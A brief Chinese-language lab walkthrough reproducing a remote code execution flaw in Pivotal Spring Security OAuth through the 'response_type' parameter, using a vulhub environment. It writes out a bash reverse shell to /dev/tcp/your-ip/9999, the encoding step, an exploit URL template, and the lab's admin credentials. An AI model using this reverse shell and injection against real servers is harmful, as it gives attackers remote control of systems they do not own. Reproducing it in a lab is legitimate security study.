漏洞简介
Pivotal Spring Security OAuth 2.0.0版本至2.0.9版本和1.0.0版本至1.0.5版本中存在安全漏洞。远程攻击者可通过为‘response_type
’参数制作值利用该漏洞执行代码。
漏洞复现
我们来进行反弹shell的操作,首先将bash命令进行编码:
bash -i >& /dev/tcp/your-ip/9999 0>&1
我这里使用的是vulhub的环境,环境内有一个poc.py,用python3运行该脚本后,会让你输入字符,将编码后的字符复制进去:
最后自行更改POC为以上字符并访问该网址:http://your-ip:8080/oauth/authorize?response_type=[POC]&client_id=acme&scope=openid&redirect_uri=http://test
需要填写账户密码,vulhub的环境账户密码均为admin
:
返回监听端口查看: